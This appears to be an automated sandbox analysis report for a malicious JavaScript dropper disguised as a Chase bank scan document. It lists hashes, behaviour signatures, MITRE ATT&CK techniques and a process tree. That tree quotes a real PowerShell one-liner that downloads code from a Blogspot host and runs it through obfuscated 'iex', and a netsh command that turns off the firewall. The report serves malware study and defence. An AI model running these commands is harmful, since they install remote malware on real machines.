Overview

overview

10

Static

static

1

New_ScanDo...ice.js

windows7-x64

7

New_ScanDo...ice.js

windows10-1703-x64

10

New_ScanDo...ice.js

windows10-2004-x64

10

New_ScanDo...ice.js

windows11-21h2-x64

10

Resubmissions

16-01-2024 10:45

240116-mtr1naaaeq 10

16-01-2024 10:39

240116-mpymmshhgp 10

Analysis

  • max time kernel
    137s
  • max time network
    198s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231222-en
  • resource tags

    arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    16-01-2024 10:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New_ScanDoc#092387CHASEeAdvice.js

  • Size

    1.4MB

  • MD5

    286d534eb759c671fa9e79cfafd3bc85

  • SHA1

    d165938c1c607618c5cb6d9d11cf5b371f007ac7

  • SHA256

    77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b

  • SHA512

    3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b

  • SSDEEP

    192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4332
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5728.tmp" "c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\CSCBA3B8444E65B4789B288C213A648995.TMP"
          4⤵
            PID:4480
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:1604
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3480
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3016
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 800
            4⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:4916
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2312
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 800
            4⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:2868

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    3
    T1082

    Lateral Movement

    Collection

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES5728.tmp
      Filesize

      1KB

      MD5

      9df310e571587ef5d6f9271dd742da03

      SHA1

      adbd4d48b7e34ca53a9e6192fbd97c28dbbc44ea

      SHA256

      5931f4bc97e519cb65351f874f5ac85a11510225b9d0483cc795c29af104bdc4

      SHA512

      4ee35307bec1101d730102a8f6414f4bb68e0035de377e3f3a0461dcd36e3e31f837a45033ab422fc16852875f633c492d9a096e23609b3068afe5d4c4852d16

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lzjgo4kl.kkv.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.dll
      Filesize

      1KB

      MD5

      df2b079fd225b145e3f4e9450b1b7949

      SHA1

      e5fa96b7de63e8316c0c8edb3b0322603c44dd2e

      SHA256

      a49df7b321367cf606d102050712b5ea51ac3aac0808a0bb7ad19a9b7b83d480

      SHA512

      acae3386885e2ab05724ae10dcf55ac8cc1759fafa551de9c0fee70d9687b016e27c8eb24a9fa05372c8bd10eff02d00e775d9308b38d44c37cf71483d4d5740

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\CSCBA3B8444E65B4789B288C213A648995.TMP
      Filesize

      652B

      MD5

      aa3cc8686cb07e4ee766e1d57d762821

      SHA1

      3dc7d28192b5dc21236d9128b095e181011a022d

      SHA256

      d3d121816d9db87094a7d95b47370d53a1772b41be6f29adec0c17234b43126a

      SHA512

      3fffcebc8da6987976f1c99d695720f8fe4a1b48bdccd9f5db05c77a61ec81d16f851f98c530787009eac0edae088e080fbffc8c4cb5502226baa3defe48588d

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.0.cs
      Filesize

      870B

      MD5

      e06ebf853695db38aaac82c9af297ae4

      SHA1

      ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

      SHA256

      79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

      SHA512

      036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.cmdline
      Filesize

      369B

      MD5

      e878b39ea67eaa28e40b776aedfb970e

      SHA1

      3aae00ceef102087ff0a193200b888cdc47a2e9a

      SHA256

      c8eeaf61c4681db5648d788679aa10855be494b39a1344b0100db32ad08d398e

      SHA512

      21d3f783e4d540400756c750cdb5aac4d085fe7261026236f5b2b55e857e6c435a0ec97989a273a9edd37d3968d15d44788036e4a923325b22277835f3863be1

      Download Submit

    • memory/2312-61-0x00000000701B0000-0x0000000070761000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2312-60-0x00000000701B0000-0x0000000070761000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2312-68-0x00000000701B0000-0x0000000070761000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3016-48-0x0000000070210000-0x00000000707C1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3016-46-0x0000000070210000-0x00000000707C1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3016-55-0x0000000070210000-0x00000000707C1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3016-47-0x0000000001820000-0x0000000001830000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3016-43-0x0000000000400000-0x000000000048C000-memory.dmp

      Filesize

      560KB

      Download

    • memory/3480-41-0x0000000004F60000-0x0000000004F70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3480-71-0x0000000006550000-0x000000000655A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3480-34-0x0000000000530000-0x00000000005BC000-memory.dmp

      Filesize

      560KB

      Download

    • memory/3480-33-0x0000000074750000-0x0000000074F01000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3480-35-0x00000000053B0000-0x0000000005956000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3480-36-0x0000000004CA0000-0x0000000004D06000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3480-38-0x0000000004EA0000-0x0000000004F32000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3480-37-0x0000000004E00000-0x0000000004E9C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/3480-77-0x0000000004F60000-0x0000000004F70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3480-42-0x0000000005140000-0x0000000005302000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/3480-76-0x0000000074750000-0x0000000074F01000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3480-39-0x0000000004D10000-0x0000000004D60000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4332-13-0x000001D6E48A0000-0x000001D6E4A62000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/4332-9-0x00007FFF54350000-0x00007FFF54E12000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4332-27-0x000001D6CC190000-0x000001D6CC198000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4332-31-0x000001D6CBB30000-0x000001D6CBB4A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4332-10-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4332-44-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4332-11-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4332-57-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4332-12-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4332-45-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4332-69-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4332-8-0x000001D6E42B0000-0x000001D6E42D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4332-70-0x000001D6E4A70000-0x000001D6E4BDA000-memory.dmp

      Filesize

      1.4MB

      Download

    • memory/4332-29-0x000001D6E4A70000-0x000001D6E4BDA000-memory.dmp

      Filesize

      1.4MB

      Download

    • memory/4332-74-0x000001D6E4A70000-0x000001D6E4BDA000-memory.dmp

      Filesize

      1.4MB

      Download

    • memory/4332-75-0x00007FFF54350000-0x00007FFF54E12000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4332-40-0x00007FFF54350000-0x00007FFF54E12000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4332-30-0x000001D6CBAF0000-0x000001D6CBAFE000-memory.dmp

      Filesize

      56KB

      Download